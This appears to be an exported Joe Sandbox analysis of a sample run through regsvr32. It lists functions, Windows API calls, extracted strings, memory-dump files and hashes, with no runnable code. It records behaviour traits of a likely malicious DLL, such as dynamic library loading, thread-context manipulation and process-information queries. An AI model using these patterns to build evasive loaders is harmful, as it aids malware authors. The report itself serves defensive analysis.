String ID: +F4$ +F4$ +F4$ +F4$ IF4$ IF4$ IF4$ IF4$ yF4$ yF4$ yF4$ yF4$&1_H$(3F4$(3F4$(3F4$(3F4$(MF4$(MF4$(MF4$(MF4$(iF4$(iF4$(iF4$(iF4$(vF4$(vF4$(vF4$(vF4$88F4$88F4$88F4$88F4$8jF4$8jF4$8jF4$8jF4$91_H$@(F4$@(F4$@(F4$@(F4$@HF4$@HF4$@HF4$@HF4$H$H$HVF4$HVF4$HVF4$HVF4$HzF4$HzF4$HzF4$HzF4$P$F4$P$F4$P$F4$P$F4$P1F4$P1F4$P1F4$P1F4$X{F4$X{F4$X{F4$X{F4$h6F4$h6F4$h6F4$h6F4$hUF4$hUF4$hUF4$hUF4$p.F4$p.F4$p.F4$pcF4$pcF4$pcF4$pcF4$x9F4$x9F4$x9F4$x9F4$xRF4$xRF4$xRF4$xRF4$xkF4$xkF4$xkF4$0_H$0_H$AF4$AF4$AF4$AF4$nF4$nF4$nF4$nF4$~F4$~F4$~F4$~F4
API String ID: 0-1688883694
Opcode ID: aa1c2757a47c3b5b9b8904291662050123117c5ea1af10a12d867a14b06de386
Instruction ID: fd48b04e4111421166f4ef9615b30d08b858f5e3cb42c2a7c2bb0f6fafd99ba1
Opcode Fuzzy Hash: aa1c2757a47c3b5b9b8904291662050123117c5ea1af10a12d867a14b06de386
Instruction Fuzzy Hash: 3DC3C452F0DD4B0FEBA6A62C44F527967C2EF9B244B5900BBD14DC7296EE2CEC029341

Function 00007FFDA33E0940 Relevance: 110.4, APIs: 51, Strings: 10, Instructions: 3612COMMON

Download Yara Rule

APIs

FreeEnvironmentStringsW.KERNEL32 ref: 00007FFDA33E0B2A

Part of subcall function 00007FFDA33A6660: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FFDA33A6A81

CloseHandle.KERNEL32 ref: 00007FFDA33E1930
GetLastError.KERNEL32 ref: 00007FFDA33E48F3
CloseHandle.KERNEL32 ref: 00007FFDA33E49E4
CloseHandle.KERNEL32 ref: 00007FFDA33E4A2B
CloseHandle.KERNEL32 ref: 00007FFDA33E4A92
CloseHandle.KERNEL32 ref: 00007FFDA33E4AA7
CloseHandle.KERNEL32 ref: 00007FFDA33E4F64

Strings

assertion failed: self.height > 0, xrefs: 00007FFDA33E487F
\cmd.exemaximum number of ProcThreadAttributes exceeded, xrefs: 00007FFDA33E2E67, 00007FFDA33E2EA8
]?\\, xrefs: 00007FFDA33E13D0
#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c ", xrefs: 00007FFDA33E3C05
exe\\.\NULexit code: , xrefs: 00007FFDA33E20C9, 00007FFDA33E2231, 00007FFDA33E2418, 00007FFDA33E26CB, 00007FFDA33E291E
PATHstd\src\sys_common\process.rs, xrefs: 00007FFDA33E2835
assertion failed: is_code_point_boundary(self, new_len), xrefs: 00007FFDA33E17F6, 00007FFDA33E21DD
.exeprogram not found, xrefs: 00007FFDA33E156D
\?\\, xrefs: 00007FFDA33E13C8
program path has no file name, xrefs: 00007FFDA33E4FD0

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID: CloseHandle$EnvironmentErrorFreeLastStringsmemcpy
String ID: program path has no file name$#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "$.exeprogram not found$PATHstd\src\sys_common\process.rs$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NULexit code:
API String ID: 3975177916-1077193248
Opcode ID: d42acf5933bc6688dd14b0afde4729129836f506148609f5942b4aeb37785f2b
Instruction ID: 122c6e35b93d6695a43c39772c2b2f92ea7104cccbbb3d3d458a794409675bda
Opcode Fuzzy Hash: d42acf5933bc6688dd14b0afde4729129836f506148609f5942b4aeb37785f2b
Instruction Fuzzy Hash: 4373A562B0EED184EB70AF25D8603FD23A2FB44789F544135DA4D6BB96DF7AD2418308

Function 00007FFD3455000A Relevance: 48.5, Strings: 36, Instructions: 3545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@3A4, xrefs: 00007FFD34552C65
@3A4, xrefs: 00007FFD34551FC2
@3A4, xrefs: 00007FFD345521CD
@3A4, xrefs: 00007FFD345525DC
@3A4, xrefs: 00007FFD34552526
@3A4, xrefs: 00007FFD34552093
@3A4, xrefs: 00007FFD3455234B
@3A4, xrefs: 00007FFD345524F0
@3A4, xrefs: 00007FFD34551F37
@3A4, xrefs: 00007FFD34552714
@3A4, xrefs: 00007FFD34552C3E
@3A4, xrefs: 00007FFD345520C5
@3A4, xrefs: 00007FFD3455292D
@3A4, xrefs: 00007FFD34552BD9
@3A4, xrefs: 00007FFD3455296F
@3A4, xrefs: 00007FFD34552224
@3A4, xrefs: 00007FFD3455276B
@3A4, xrefs: 00007FFD3455269D
@3A4, xrefs: 00007FFD34552022
@3A4, xrefs: 00007FFD3455279A
@3A4, xrefs: 00007FFD34552A8F
@3A4, xrefs: 00007FFD34552838
@3A4, xrefs: 00007FFD3455286B
@3A4, xrefs: 00007FFD345528D9
@3A4, xrefs: 00007FFD34552996
(b#4, xrefs: 00007FFD34551E37
@3A4, xrefs: 00007FFD34552AC5
@3A4, xrefs: 00007FFD34552404
@3A4, xrefs: 00007FFD34551EF9
@3A4, xrefs: 00007FFD34552253
@3A4, xrefs: 00007FFD34552159
@3A4, xrefs: 00007FFD34552C0E
@3A4, xrefs: 00007FFD34552B52
@3A4, xrefs: 00007FFD34552612
@3A4, xrefs: 00007FFD34552315
@3A4, xrefs: 00007FFD3455243A

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: (b#4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-3492052578
Opcode ID: 9e06bc9260b09e96d2408c9d1a5839ccaed91814e4253c4ba1672fa6569b3900
Instruction ID: 2a003513f082c9a095dc732d06105005edde6a8549ea259990047e690b3a1ce7
Opcode Fuzzy Hash: 9e06bc9260b09e96d2408c9d1a5839ccaed91814e4253c4ba1672fa6569b3900
Instruction Fuzzy Hash: 614327307589194FE288FB28C8A67B573D6FBCD324B9441BDD40EC72D6CD29AC429B85

Function 00007FFD3435F74D Relevance: 47.1, Strings: 36, Instructions: 2051COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34368395
@3A4, xrefs: 00007FFD343684A7
@3A4, xrefs: 00007FFD34366AF6
@3A4, xrefs: 00007FFD34368465
@3A4, xrefs: 00007FFD34367B59
@3A4, xrefs: 00007FFD343683BF
@3A4, xrefs: 00007FFD34367209
@3A4, xrefs: 00007FFD34366976
@3A4, xrefs: 00007FFD34367AF5
@3A4, xrefs: 00007FFD34367BFA
@3A4, xrefs: 00007FFD3436863B
@3A4, xrefs: 00007FFD34367BC4
@3A4, xrefs: 00007FFD34366D59
@3A4, xrefs: 00007FFD34366A75
@3A4, xrefs: 00007FFD34367892
@3A4, xrefs: 00007FFD34367565
@3A4, xrefs: 00007FFD34366E8C
@3A4, xrefs: 00007FFD34366F1A
@3A4, xrefs: 00007FFD343683FB
@3A4, xrefs: 00007FFD34366E58
@3A4, xrefs: 00007FFD34368710
@3A4, xrefs: 00007FFD34367C57
@3A4, xrefs: 00007FFD34366BD1
@3A4, xrefs: 00007FFD34367973
@3A4, xrefs: 00007FFD343685A3
@3A4, xrefs: 00007FFD34366D88
@3A4, xrefs: 00007FFD343674C6
@3A4, xrefs: 00007FFD34367604
@3A4, xrefs: 00007FFD34367A0A
@3A4, xrefs: 00007FFD343669C9
pH4, xrefs: 00007FFD34368435
@3A4, xrefs: 00007FFD34367749
@3A4, xrefs: 00007FFD3436708E
@3A4, xrefs: 00007FFD343684D9
@3A4, xrefs: 00007FFD3436693D
@3A4, xrefs: 00007FFD34368517

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$pH4
API String ID: 0-100780807
Opcode ID: d7f50e05cd3b9a4836118b90fd70c36a61611cda6df454c93b74106f46bcbdae
Instruction ID: 9643e31e498e5b7a812c8597e37d212b85d01df8398db03ff846ae3c5ffc561c
Opcode Fuzzy Hash: d7f50e05cd3b9a4836118b90fd70c36a61611cda6df454c93b74106f46bcbdae
Instruction Fuzzy Hash: D2F2C630B5894A8FEB98FB58C8E5AA877E1FF99314F5001B9D50DD3292DE3CB8419B41

Function 00007FFD34551E43 Relevance: 45.0, Strings: 35, Instructions: 1255
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@3A4, xrefs: 00007FFD34552C65
@3A4, xrefs: 00007FFD34551FC2
@3A4, xrefs: 00007FFD345521CD
@3A4, xrefs: 00007FFD345525DC
@3A4, xrefs: 00007FFD34552526
@3A4, xrefs: 00007FFD34552093
@3A4, xrefs: 00007FFD3455234B
@3A4, xrefs: 00007FFD345524F0
@3A4, xrefs: 00007FFD34551F37
@3A4, xrefs: 00007FFD34552714
@3A4, xrefs: 00007FFD34552C3E
@3A4, xrefs: 00007FFD345520C5
@3A4, xrefs: 00007FFD3455292D
@3A4, xrefs: 00007FFD34552BD9
@3A4, xrefs: 00007FFD3455296F
@3A4, xrefs: 00007FFD34552224
@3A4, xrefs: 00007FFD3455276B
@3A4, xrefs: 00007FFD3455269D
@3A4, xrefs: 00007FFD34552022
@3A4, xrefs: 00007FFD3455279A
@3A4, xrefs: 00007FFD34552A8F
@3A4, xrefs: 00007FFD34552838
@3A4, xrefs: 00007FFD3455286B
@3A4, xrefs: 00007FFD345528D9
@3A4, xrefs: 00007FFD34552996
@3A4, xrefs: 00007FFD34552AC5
@3A4, xrefs: 00007FFD34552404
@3A4, xrefs: 00007FFD34551EF9
@3A4, xrefs: 00007FFD34552253
@3A4, xrefs: 00007FFD34552159
@3A4, xrefs: 00007FFD34552C0E
@3A4, xrefs: 00007FFD34552B52
@3A4, xrefs: 00007FFD34552612
@3A4, xrefs: 00007FFD34552315
@3A4, xrefs: 00007FFD3455243A

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-1987985751
Opcode ID: 1a9cf10aa7bc006ae135d9f0c8991e4d9bdc68e9e890a7b24fce21e1266859de
Instruction ID: 2f8ca75e53480dbe973531c8410e5ded6bc1d58e88b979497c46558a0f0c4e39
Opcode Fuzzy Hash: 1a9cf10aa7bc006ae135d9f0c8991e4d9bdc68e9e890a7b24fce21e1266859de
Instruction Fuzzy Hash: 4F92AE31B599094FEBC9FB2884B66B4B3D2FF99314B5401B9D00EC7292DD2DBC429B85

Function 00007FFD3436D33F Relevance: 40.0, Strings: 31, Instructions: 1231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@3A4, xrefs: 00007FFD3436E3B1
@3A4, xrefs: 00007FFD3436D82B
@3A4, xrefs: 00007FFD3436E40E
@3A4, xrefs: 00007FFD3436E49E
@3A4, xrefs: 00007FFD3436E2DA
@3A4, xrefs: 00007FFD3436E46E
@3A4, xrefs: 00007FFD3436E500
@3A4, xrefs: 00007FFD3436E215
8E4, xrefs: 00007FFD3436DB7E
@3A4, xrefs: 00007FFD3436E01D
@3A4, xrefs: 00007FFD3436D8A1
@3A4, xrefs: 00007FFD3436E1A1
@3A4, xrefs: 00007FFD3436E0C2
;Q_A, xrefs: 00007FFD3436D6EE
@3A4, xrefs: 00007FFD3436D577
@3A4, xrefs: 00007FFD3436D9FB
@3A4, xrefs: 00007FFD3436E43E
@3A4, xrefs: 00007FFD3436E268
@3A4, xrefs: 00007FFD3436D4FC
@3A4, xrefs: 00007FFD3436D59E
@3A4, xrefs: 00007FFD3436D65B
@3A4, xrefs: 00007FFD3436D687
@3A4, xrefs: 00007FFD3436D8F4
@3A4, xrefs: 00007FFD3436D5F6
@3A4, xrefs: 00007FFD3436E116
@3A4, xrefs: 00007FFD3436DF1D
@3A4, xrefs: 00007FFD3436DFCA
@3A4, xrefs: 00007FFD3436D7F2
@3A4, xrefs: 00007FFD3436E381
@3A4, xrefs: 00007FFD3436E3DE
@3A4, xrefs: 00007FFD3436DF71

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: 8E4$;Q_A$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-3191074168
Opcode ID: 469b1435d6859379b4c3a85f4ec537e4791f8618a761522307ec7385ce5fc5d1
Instruction ID: 20d377158689e5d7c401855b0559ee4c1d35e1a338e385938204315af9cfccb3
Opcode Fuzzy Hash: 469b1435d6859379b4c3a85f4ec537e4791f8618a761522307ec7385ce5fc5d1
Instruction Fuzzy Hash: 7892A13075CA4A4BE698FB1884E27B5B3D2FB9A324F40017ED54ED32D2DE3CA8459746

Function 00007FFDA33820D0 Relevance: 34.7, APIs: 15, Strings: 4, Instructions: 1428memorysynchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FFDA33821BD
GetLastError.KERNEL32 ref: 00007FFDA33821C2
SetFileAttributesW.KERNEL32 ref: 00007FFDA338229B
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FFDA3382327
HeapCreate.KERNEL32 ref: 00007FFDA33823AA
HeapAlloc.KERNEL32 ref: 00007FFDA33823C2
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FFDA33823DB

Strings

, xrefs: 00007FFDA3383351
/i:S, xrefs: 00007FFDA3382546
SYNC, xrefs: 00007FFDA338254B
a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs, xrefs: 00007FFDA3383B69, 00007FFDA3383C15, 00007FFDA3383C40

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID: CreateHeapmemcpy$AllocAttributesErrorFileLastMutex
String ID: $/i:S$SYNC$a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs
API String ID: 622075969-830671369
Opcode ID: 410052c8f563e268baf8f9bb690f9967612beb368af972c5d74a04c65992e04b
Instruction ID: d5de0fb91b2d5badbb4c8d66591c60f89901548f9976e7ac40e1bf8e4e4e8883
Opcode Fuzzy Hash: 410052c8f563e268baf8f9bb690f9967612beb368af972c5d74a04c65992e04b
Instruction Fuzzy Hash: A1F2717170EAC282EA71AB51F4507EAA362FB84780F404136DA8C67B9BDF7ED144CB44

Function 00007FFDA338B900 Relevance: 33.1, APIs: 16, Strings: 2, Instructions: 1595COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA338C45F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FFDA338C5BF
CloseHandle.KERNEL32 ref: 00007FFDA338CAA1
CloseHandle.KERNEL32 ref: 00007FFDA338CAFC

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FFDA338DEAF, 00007FFDA338DF0B
:, xrefs: 00007FFDA338DB56

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID: CloseHandle$memcpymemset
String ID: :$called `Result::unwrap()` on an `Err` value
API String ID: 3399779480-2450422549
Opcode ID: 1949d718701eb245e5e19fe9809a7876fca49a504e09f021527acdefe541dd75
Instruction ID: d1e62d43f4bd6bb5dec19833b8c2a8c5dfc077687aac8fac1bcf1c0da4be7ac4
Opcode Fuzzy Hash: 1949d718701eb245e5e19fe9809a7876fca49a504e09f021527acdefe541dd75
Instruction Fuzzy Hash: 8E237222A0EFC691FA719B54F4503EAA361FB84744F405236DACC62B96DF7DE284CB44

Function 00007FFDA338A040 Relevance: 26.8, APIs: 14, Strings: 1, Instructions: 545
nativelibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA338A06E
GetModuleHandleA.KERNEL32 ref: 00007FFDA338A101
GetModuleHandleA.KERNEL32 ref: 00007FFDA338A12F
LoadLibraryA.KERNEL32 ref: 00007FFDA338A13C
GetProcAddress.KERNEL32 ref: 00007FFDA338A222
GetModuleHandleA.KERNEL32 ref: 00007FFDA338A35E
GetProcAddress.KERNEL32 ref: 00007FFDA338A442
AddVectoredExceptionHandler.KERNEL32 ref: 00007FFDA338A4A5
NtQueryInformationProcess.NTDLL ref: 00007FFDA338A4DC
NtQuerySystemInformation.NTDLL ref: 00007FFDA338A529
NtGetContextThread.NTDLL ref: 00007FFDA338A705
NtSetContextThread.NTDLL ref: 00007FFDA338A78E

Strings

called `Result::unwrap()` on an `Err` value/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\collections\btree\navigate.rs, xrefs: 00007FFDA338A1DB, 00007FFDA338A31A, 00007FFDA338A3FB, 00007FFDA338A969

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID: HandleModule$AddressContextInformationProcQueryThread$ExceptionHandlerLibraryLoadProcessSystemVectoredmemset
String ID: called `Result::unwrap()` on an `Err` value/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\collections\btree\navigate.rs
API String ID: 2177257871-362855569
Opcode ID: e45670c3bc7dfe4d6d85d0c5af0b219f249f79a7f3f1dde18880113d17d33a10
Instruction ID: 690d1d346e80a0403737944bd8e57c364b348f3cc7ab8e2755789b45a3eb962d
Opcode Fuzzy Hash: e45670c3bc7dfe4d6d85d0c5af0b219f249f79a7f3f1dde18880113d17d33a10
Instruction Fuzzy Hash: 53429431B0EB8282EA619B51E4603BAB7A2FF45784F044135DE8D67B97DF7EE0458708

Function 00007FFD3435CEF3 Relevance: 23.7, Strings: 18, Instructions: 1169
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@3A4, xrefs: 00007FFD343A3D73
@3A4, xrefs: 00007FFD3435DE2D
@3A4, xrefs: 00007FFD3435D1CC
@3A4, xrefs: 00007FFD3435DEAA
@3A4, xrefs: 00007FFD343A3D9F
@3A4, xrefs: 00007FFD343A3DCB
@3A4, xrefs: 00007FFD3435D197
@3A4, xrefs: 00007FFD343A3EA7
@3A4, xrefs: 00007FFD343A3E7B
@3A4, xrefs: 00007FFD3435DDF5
@3A4, xrefs: 00007FFD343A3DF7
@3A4, xrefs: 00007FFD343A3ED3
@3A4, xrefs: 00007FFD343A3F1A
@3A4, xrefs: 00007FFD3435DE84
@3A4, xrefs: 00007FFD343A3E4F
^, xrefs: 00007FFD3435D039
@3A4, xrefs: 00007FFD343A3E23
x~E4, xrefs: 00007FFD343A5381

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$^$x~E4
API String ID: 0-730899913
Opcode ID: baeda2051e73de203ee980ef7780c0fd449ab88b14c4372893cef057fa37274f
Instruction ID: dbcf8ef445d473a7962babbd20bb2e8cd2a07788186ba950cdea261d47e713b2
Opcode Fuzzy Hash: baeda2051e73de203ee980ef7780c0fd449ab88b14c4372893cef057fa37274f
Instruction Fuzzy Hash: 0A725821B5DA4A4FEB98B76894B51F973D1EF96310B0442BAD04EC72D3DE3CB8429781

Function 00007FFD343566F2 Relevance: 15.7, Strings: 12, Instructions: 656COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFD34356572
@3A4, xrefs: 00007FFD34356456
@3A4, xrefs: 00007FFD34356588
h~A4, xrefs: 00007FFD34356A51
H*54, xrefs: 00007FFD34356621
@3A4, xrefs: 00007FFD3435689F
@3A4, xrefs: 00007FFD34356901
@3A4, xrefs: 00007FFD3435664C
@3A4, xrefs: 00007FFD343565D3
@}A4, xrefs: 00007FFD343564A4
@3A4, xrefs: 00007FFD343564EA
@3A4, xrefs: 00007FFD34356535

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@}A4$H$H*54$h~A4
API String ID: 0-1500607289
Opcode ID: 06753ab8fb17db45db8c4c26db36d13f96b872667bcedeebb2a7849f024f33b2
Instruction ID: 4d162139ae588c747f70786fdb7f915f68137b1abcb458eaa5ed0781b1154b96
Opcode Fuzzy Hash: 06753ab8fb17db45db8c4c26db36d13f96b872667bcedeebb2a7849f024f33b2
Instruction Fuzzy Hash: 9922277668D7890FE35AAB2488651B47BD1EF83224F0501FBD58DCB0A3DE2D78069352

Function 00007FFD3435D3C8 Relevance: 14.6, Strings: 11, Instructions: 872COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3438D426
@3A4, xrefs: 00007FFD3439249A
0YM4, xrefs: 00007FFD34392707
@3A4, xrefs: 00007FFD34392940
TM4, xrefs: 00007FFD3438D3A1
@3A4, xrefs: 00007FFD3439257F
@3A4, xrefs: 00007FFD343928C4
z84, xrefs: 00007FFD3439238F
z=N4, xrefs: 00007FFD34392878
@3A4, xrefs: 00007FFD343927DA
@3A4, xrefs: 00007FFD34392851

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: z84$0YM4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$z=N4$TM4
API String ID: 0-1324440660
Opcode ID: 1d13c19fc5e99ee3d75c9e6495b7022e7a13f4b2fb5ddd65ad533c5a8bb5b021
Instruction ID: e452dc5236fe7af7843486b1b2f97a8f963c18bbf55acee1e1936b11b9c6dcf9
Opcode Fuzzy Hash: 1d13c19fc5e99ee3d75c9e6495b7022e7a13f4b2fb5ddd65ad533c5a8bb5b021
Instruction Fuzzy Hash: E842B531B5CA194FDB94FB5C98A26B9B3D1FB9A314B0001BAD14DD3292DE3CBC429785

Function 00007FFDA33DEFF0 Relevance: 12.5, APIs: 8, Instructions: 513COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FFDA33DF060
ProcessPrng.BCRYPTPRIMITIVES ref: 00007FFDA33DF08C

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
